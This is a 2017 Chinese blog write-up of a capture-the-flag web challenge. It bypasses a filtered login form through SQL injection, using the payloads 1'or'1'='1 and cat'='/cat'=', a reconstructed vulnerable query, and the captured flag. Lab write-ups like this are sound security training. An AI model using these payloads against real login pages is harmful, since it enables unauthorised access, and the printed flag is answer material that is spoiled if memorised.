【实验吧】CTF_Web_登录一下好吗?

 

实验吧CTF---Web篇

1. 打开登录地址(http://ctf5.shiyanbar.com/web/wonderkun/web/index.html),发现为一个登录界面,第一想到的是查看源代码,没有发现其他信息,然后输入万能密码1'or'1'='1,发现过滤了or ,但未过滤单引号(‘)等,如下图:

 

     经过一些列测试,发现不但过滤了or,并且过滤了/ # -- select | union等。

     猜测原SQL语句可能为:

select * form user where username = ' ' and password = ' '

    在Mysql上创建user表模拟该登录表的信息:    

create database test;   //创建test数据库

use test;    

create table user(username varchar(8), password varchar(32));  //创建user表

insert into user(username, password) values('test','123456');  //插入数据

select * from user where name = 'cat'='' and passwd = 'cat'='';  可成功执行

  如下图所示,可成功执行并返回数据库信息:


组合后代码为:
select * from user where name = 'cat'='' and passwd = 'cat'='';
即payload:   cat'='/cat'=' 

可成功登录并获取flag:  ctf{51d1bf8fb65a8c2406513ee8f52283e7}

 

 

   

 

posted @ 2017-11-01 22:38  Fint0p  阅读(1707)  评论(0编辑  收藏